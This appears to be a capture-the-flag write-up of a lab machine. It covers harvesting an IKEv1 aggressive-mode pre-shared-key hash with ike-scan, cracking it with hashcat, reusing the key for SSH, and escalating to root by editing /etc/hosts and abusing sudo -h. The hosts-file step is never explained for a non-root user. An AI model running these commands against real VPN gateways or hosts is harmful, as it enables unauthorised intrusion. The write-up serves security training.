Overview
Expressway covers a real-world VPN misconfiguration that has been quietly leaking pre-shared keys for decades. IKEv1 aggressive mode — still widely used in legacy VPN deployments — sends the initiator's identity and a hash of the PSK in the clear during the handshake negotiation, before any encryption is established. An attacker on the network who sends an IKE probe can harvest this hash and submit it offline to a cracking tool.
The cracked PSK turns out to be reused as a system SSH password — a credential hygiene failure that's extremely common in environments where a network appliance's management password is set to match other system credentials. Privilege escalation uses a non-obvious edge case in how sudo handles the -h flag when the specified hostname resolves to localhost.
Enumeration
nmap -sV -sC -p- --min-rate 5000 -oA expressway 10.10.11.x
# Also scan UDP for common VPN ports
nmap -sU -p 500,4500,1194 10.10.11.xTCP: 22 (SSH, OpenSSH), 80 (Nginx, company landing page with no interesting functionality). UDP 500 is open — IKE/ISAKMP. UDP 4500 (NAT-T) also open. The presence of an IKE listener is the intended pivot point.
Foothold — IKEv1 Aggressive Mode PSK Disclosure
Why Aggressive Mode is Dangerous
IKEv1 has two modes for Phase 1 (the SA negotiation phase): main mode and aggressive mode. In main mode, identity is protected — the identities are only exchanged after encryption is established. In aggressive mode, the initiator sends its identity in the first message unencrypted to reduce round-trips, and the responder replies with its identity and a hash of the pre-shared key computed over the exchanged nonces and identities.
Aggressive mode was designed for speed in remote-access VPN scenarios where the initiator's identity isn't known in advance. The tradeoff is that the PSK hash is transmitted before any encryption is established — trivially capturable by any on-path observer or active prober.
Because this is an active probe (not passive sniffing), we can trigger the disclosure by initiating a handshake with any identity — the gateway responds with its hash regardless of whether our identity is valid.
Extracting the PSK Hash with ike-scan
# Probe for supported transform sets
ike-scan --trans=5,2,1,2 10.10.11.x
# Trigger aggressive mode and capture the hash
ike-scan --aggressive --id=vpnuser 10.10.11.x
# Output includes:
# HDR*(IDii, [CERT, ] SIG_R)
# Aggressive Mode Handshake returned
# Hash: SHA1:<nonce_i>:<nonce_r>:<psk_hash>
# Extract the full hash material for hashcat
ike-scan --aggressive --id=vpnuser --pskcrack=/tmp/psk.hash 10.10.11.x
The --pskcrack flag writes the hash material in a format directly consumable by hashcat.
Cracking the PSK
# hashcat mode 5400 = IKE-PSK MD5 / SHA1 (aggressive mode)
hashcat -m 5400 /tmp/psk.hash /usr/share/wordlists/rockyou.txt
# Session..........: hashcat
# Status...........: Cracked
# Recovered........: 1/1 (100.00%) Digests
# vpnuser:highway2026
The cracked PSK is highway2026. Testing it as the SSH password for users on the box:
ssh [email protected] # Password: highway2026
# james@expressway:~$Privilege Escalation — sudo -h Hostname Edge Case
Enumerating sudo Rights
sudo -l
# User james may run the following commands on expressway:
# (root) NOPASSWD: /usr/bin/sudo -h offramp.expressway.htb -i
The rule permits running sudo -h offramp.expressway.htb -i as root without a password. The -h flag in sudo specifies a target hostname — intended for running commands on a remote host. The -i flag simulates an initial login shell for root.
The Edge Case
When sudo -h <hostname> is used with a hostname that resolves to 127.0.0.1 or the local machine's address, sudo in certain versions executes the command locally rather than attempting a remote connection. If the specified FQDN is in the system's hosts file or resolves locally, sudo treats it as a local execution context.
# Add the target hostname to /etc/hosts pointing to localhost
echo "127.0.0.1 offramp.expressway.htb" >> /etc/hosts
# Now execute the allowed sudo command — resolves locally, runs as root
sudo -h offramp.expressway.htb -i
# root@expressway:~#
The -i flag spawns a root login shell. We're root.
Flags
cat /home/james/user.txt
cat /root/root.txtTakeaways
IKEv1 aggressive mode PSK disclosure is not a new attack — it was documented extensively in the early 2000s — but legacy VPN appliances and configurations are still routinely encountered on engagements. Any IKE listener is worth probing with ike-scan; if aggressive mode is supported, the PSK hash comes for free. PSK crackability depends entirely on password strength, but the hash is always harvestable.
The sudo hostname edge case is subtle and easy to miss: the -h flag is unusual enough that many operators don't analyse its behaviour carefully when writing sudo rules. A sudo rule that grants -h <hostname> is only safe if the attacker cannot influence the hostname's resolution — either by writing to /etc/hosts, controlling DNS, or finding a hosts file with permissive write permissions. Always treat sudo rules involving -h with the same scrutiny as wildcard rules.